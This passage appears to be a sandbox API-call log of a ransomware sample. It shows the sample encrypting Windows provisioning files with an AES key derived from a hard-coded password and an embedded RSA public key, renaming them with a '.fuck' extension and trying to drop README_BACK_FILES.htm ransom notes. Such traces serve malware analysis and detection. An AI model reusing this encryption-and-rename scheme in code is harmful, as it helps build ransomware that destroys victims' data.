"c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.325] CryptDestroyHash (hHash=0x2817298) returned 1 [0237.325] CryptDestroyKey (hKey=0x2817858) returned 1 [0237.325] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0237.325] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.325] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.326] GetLastError () returned 0x5 [0237.326] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0237.326] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0237.326] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.327] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.327] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.327] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2833a50) returned 1 [0237.332] CryptCreateHash (in: hProv=0x2833a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.332] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.332] CryptHashData (hHash=0x2817298, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.332] CryptDeriveKey (in: hProv=0x2833a50, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817858) returned 1 [0237.332] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.332] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.332] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2793100) returned 1 [0237.333] CryptImportPublicKeyInfo (in: hCryptProv=0x2793100, dwCertEncodingType=0x1, pInfo=0x283b498*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b4c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b4d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebc20) returned 1 [0237.334] CryptEncrypt (in: hKey=0x27ebc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.334] CryptEncrypt (in: hKey=0x27ebc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844d48*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2844d48*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.334] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844d48, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.334] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.334] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.334] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.334] CloseHandle (hObject=0xffffffff) returned 1 [0237.334] CloseHandle (hObject=0xffffffff) returned 1 [0237.334] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0237.335] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0237.335] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0237.335] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0237.336] CryptDestroyHash (hHash=0x2817298) returned 1 [0237.336] CryptDestroyKey (hKey=0x2817858) returned 1 [0237.336] CryptReleaseContext (hProv=0x2833a50, dwFlags=0x0) returned 1 [0237.336] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.336] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.336] GetLastError () returned 0x5 [0237.336] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml")) returned 0x20 [0237.340] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x80) returned 0 [0237.341] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.341] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.341] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.342] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28447f8) returned 1 [0237.347] CryptCreateHash (in: hProv=0x28447f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.347] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.347] CryptHashData (hHash=0x2817298, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.347] CryptDeriveKey (in: hProv=0x28447f8, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817858) returned 1 [0237.348] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.348] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.348] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2843ef0) returned 1 [0237.349] CryptImportPublicKeyInfo (in: hCryptProv=0x2843ef0, dwCertEncodingType=0x1, pInfo=0x283b568*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b598*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b5a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2845f20) returned 1 [0237.349] CryptEncrypt (in: hKey=0x2845f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.349] CryptEncrypt (in: hKey=0x2845f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844990*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2844990*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.350] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844990, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.350] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.350] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.350] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.350] CloseHandle (hObject=0xffffffff) returned 1 [0237.350] CloseHandle (hObject=0xffffffff) returned 1 [0237.350] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml"), bFailIfExists=0) returned 0 [0237.350] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x0) returned 0 [0237.351] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml.gsg")) returned 0 [0237.351] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml.fuck")) returned 0 [0237.351] CryptDestroyHash (hHash=0x2817298) returned 1 [0237.351] CryptDestroyKey (hKey=0x2817858) returned 1 [0237.351] CryptReleaseContext (hProv=0x28447f8, dwFlags=0x0) returned 1 [0237.351] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.352] FindClose (in: hFindFile=0x27170a8 | out: hFindFile=0x27170a8) returned 1 [0237.352] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.352] AreFileApisANSI () returned 1 [0237.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2843f78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.352] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.352] GetLastError () returned 0x5 [0237.352] GetLastError () returned 0x5 [0237.352] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.352] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.353] GetLastError () returned 0x5 [0237.353] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml")) returned 0x20 [0237.353] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.353] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.353] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.354] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.354] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28446e8) returned 1 [0237.359] CryptCreateHash (in: hProv=0x28446e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.359] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.360] CryptHashData (hHash=0x28460e0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.360] CryptDeriveKey (in: hProv=0x28446e8, Algid=0x6610, hBaseData=0x28460e0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2846360) returned 1 [0237.360] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.360] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.360] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2844550) returned 1 [0237.361] CryptImportPublicKeyInfo (in: hCryptProv=0x2844550, dwCertEncodingType=0x1, pInfo=0x283b8a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b8d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b8e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28460a0) returned 1 [0237.361] CryptEncrypt (in: hKey=0x28460a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.362] CryptEncrypt (in: hKey=0x28460a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844a18*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2844a18*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.362] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844a18, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.362] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277daf8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.362] CryptEncrypt (in: hKey=0x2846360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277daf8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277daf8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.362] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.362] CloseHandle (hObject=0xffffffff) returned 1 [0237.362] CloseHandle (hObject=0xffffffff) returned 1 [0237.362] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.362] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.363] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.gsg")) returned 0 [0237.363] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.fuck")) returned 0 [0237.364] CryptDestroyHash (hHash=0x28460e0) returned 1 [0237.364] CryptDestroyKey (hKey=0x2846360) returned 1 [0237.364] CryptReleaseContext (hProv=0x28446e8, dwFlags=0x0) returned 1 [0237.364] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.364] FindClose (in: hFindFile=0x27175e8 | out: hFindFile=0x27175e8) returned 1 [0237.364] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.364] AreFileApisANSI () returned 1 [0237.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.364] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.365] GetLastError () returned 0x5 [0237.365] GetLastError () returned 0x5 [0237.365] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.365] 